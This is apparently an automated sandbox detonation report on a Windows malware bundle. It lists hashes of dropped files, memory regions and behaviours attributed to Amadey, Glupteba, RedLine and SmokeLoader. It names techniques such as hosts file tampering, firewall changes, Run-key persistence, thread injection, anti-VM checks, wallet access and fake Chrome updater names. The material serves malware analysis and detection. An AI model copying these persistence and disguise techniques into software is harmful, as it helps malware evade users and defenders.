| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/924-401-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/1204-423-0x000007FEB0990000-0x000007FEB099A000-memory.dmp
memory/2320-428-0x000000001B140000-0x000000001B422000-memory.dmp
memory/2320-430-0x0000000001F80000-0x0000000001F88000-memory.dmp
memory/2320-431-0x0000000002760000-0x00000000027E0000-memory.dmp
memory/2320-432-0x0000000002760000-0x00000000027E0000-memory.dmp
memory/2320-433-0x0000000002760000-0x00000000027E0000-memory.dmp
memory/2320-434-0x000000000276B000-0x00000000027A2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 430d7647b8c46c207dc007b48fe836ae |
| SHA1 | e3e3b306e9b897647bdf16dbcb4f81bc58a929ff |
| SHA256 | 5e6b09f4c4fd13aea7bb5419b46b301e357e4e509184500cb876c55ff136ed0f |
| SHA512 | 966c705067e28cb5886e0e1218078368b24e1ec7370388cf6027792c0a9a9d27279ded1103a8c3d32d1c2f541482d2fdb5073eef9151332ea2321963467c6c95 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FDYWHJ6UDQO96NWP1PW3.temp
| MD5 | 430d7647b8c46c207dc007b48fe836ae |
| SHA1 | e3e3b306e9b897647bdf16dbcb4f81bc58a929ff |
| SHA256 | 5e6b09f4c4fd13aea7bb5419b46b301e357e4e509184500cb876c55ff136ed0f |
| SHA512 | 966c705067e28cb5886e0e1218078368b24e1ec7370388cf6027792c0a9a9d27279ded1103a8c3d32d1c2f541482d2fdb5073eef9151332ea2321963467c6c95 |
memory/2528-441-0x000000001AFF0000-0x000000001B2D2000-memory.dmp
memory/2528-442-0x0000000002320000-0x0000000002328000-memory.dmp
memory/2528-446-0x00000000023D0000-0x0000000002450000-memory.dmp
memory/2528-447-0x00000000023D0000-0x0000000002450000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
\Program Files\Google\Chrome\updater.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
C:\Program Files\Google\Chrome\updater.exe
| MD5 | ebf830587e4df50f0a886fe4bf05bda0 |
| SHA1 | 3c0217098ca7b191d146b770eb366a9081187a66 |
| SHA256 | e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6 |
| SHA512 | a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 430d7647b8c46c207dc007b48fe836ae |
| SHA1 | e3e3b306e9b897647bdf16dbcb4f81bc58a929ff |
| SHA256 | 5e6b09f4c4fd13aea7bb5419b46b301e357e4e509184500cb876c55ff136ed0f |
| SHA512 | 966c705067e28cb5886e0e1218078368b24e1ec7370388cf6027792c0a9a9d27279ded1103a8c3d32d1c2f541482d2fdb5073eef9151332ea2321963467c6c95 |
memory/2740-458-0x0000000002720000-0x00000000027A0000-memory.dmp
memory/2740-459-0x0000000002724000-0x0000000002727000-memory.dmp
memory/2740-460-0x000000000272B000-0x0000000002762000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | 3e9af076957c5b2f9c9ce5ec994bea05 |
| SHA1 | a8c7326f6bceffaeed1c2bb8d7165e56497965fe |
| SHA256 | e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e |
| SHA512 | 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 430d7647b8c46c207dc007b48fe836ae |
| SHA1 | e3e3b306e9b897647bdf16dbcb4f81bc58a929ff |
| SHA256 | 5e6b09f4c4fd13aea7bb5419b46b301e357e4e509184500cb876c55ff136ed0f |
| SHA512 | 966c705067e28cb5886e0e1218078368b24e1ec7370388cf6027792c0a9a9d27279ded1103a8c3d32d1c2f541482d2fdb5073eef9151332ea2321963467c6c95 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2956-470-0x000000000271B000-0x0000000002752000-memory.dmp
memory/2956-469-0x0000000002714000-0x0000000002717000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | 5da3a881ef991e8010deed799f1a5aaf |
| SHA1 | fea1acea7ed96d7c9788783781e90a2ea48c1a53 |
| SHA256 | f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4 |
| SHA512 | 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09 |
\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 430d7647b8c46c207dc007b48fe836ae |
| SHA1 | e3e3b306e9b897647bdf16dbcb4f81bc58a929ff |
| SHA256 | 5e6b09f4c4fd13aea7bb5419b46b301e357e4e509184500cb876c55ff136ed0f |
| SHA512 | 966c705067e28cb5886e0e1218078368b24e1ec7370388cf6027792c0a9a9d27279ded1103a8c3d32d1c2f541482d2fdb5073eef9151332ea2321963467c6c95 |
memory/2556-528-0x0000000002294000-0x0000000002297000-memory.dmp
memory/2556-529-0x000000000229B000-0x00000000022D2000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | 3e9af076957c5b2f9c9ce5ec994bea05 |
| SHA1 | a8c7326f6bceffaeed1c2bb8d7165e56497965fe |
| SHA256 | e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e |
| SHA512 | 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 7029e43242271f90359ed8193c1e4848 |
| SHA1 | b9d38c911e4b2e6cb03a242b02022e7ff365e150 |
| SHA256 | 1a5f3744d5c71f5c96cf706649a8a3fb93b12f406562dd5fb142a94c4097017b |
| SHA512 | 2a03d3b38f8708e8b10c367451a2787f38da2ba8c0a487dfcd7ac962970e99060a41ef3278f2ca9b0c2c6bf1ac9c9529fac8f198ee3f9ca75aa896373da568ff |
memory/2696-538-0x00000000022D0000-0x0000000002350000-memory.dmp
memory/2696-539-0x00000000022D0000-0x0000000002350000-memory.dmp
memory/2696-540-0x00000000022D0000-0x0000000002350000-memory.dmp
memory/2696-541-0x00000000022D0000-0x0000000002350000-memory.dmp
memory/2944-544-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2944-546-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/3068-547-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2852-550-0x0000000000840000-0x0000000000848000-memory.dmp
memory/2852-551-0x0000000001084000-0x0000000001087000-memory.dmp
memory/2852-552-0x000000000108B000-0x00000000010C2000-memory.dmp
memory/1980-554-0x0000000000940000-0x0000000000948000-memory.dmp
memory/1980-555-0x0000000000FD4000-0x0000000000FD7000-memory.dmp
memory/1980-556-0x0000000000FDB000-0x0000000001012000-memory.dmp
memory/3068-561-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2240-562-0x00000000004B0000-0x00000000004D0000-memory.dmp
memory/2240-570-0x00000000004B0000-0x00000000004D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
| MD5 | f801950a962ddba14caaa44bf084b55c |
| SHA1 | 7cadc9076121297428442785536ba0df2d4ae996 |
| SHA256 | c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f |
| SHA512 | 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5 |
memory/1304-586-0x000000002DCE0000-0x000000002E505000-memory.dmp
memory/1304-587-0x000000002DCE0000-0x000000002E505000-memory.dmp
memory/920-588-0x0000000000400000-0x0000000000C25000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-07-02 00:14
Reported
2023-07-02 00:17
Platform
win10v2004-20230621-en
Max time kernel
103s
Max time network
153s
Command Line
Signatures
Amadey
GCleaner
Glupteba
Glupteba payload
RedLine
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\oneetx.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe | N/A |
Executes dropped EXE
UPX packed file
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
Checks installed software on the system
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1020 set thread context of 4500 | N/A | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe |
| PID 2940 set thread context of 2072 | N/A | C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 3748 set thread context of 3048 | N/A | C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 4768 set thread context of 2768 | N/A | C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
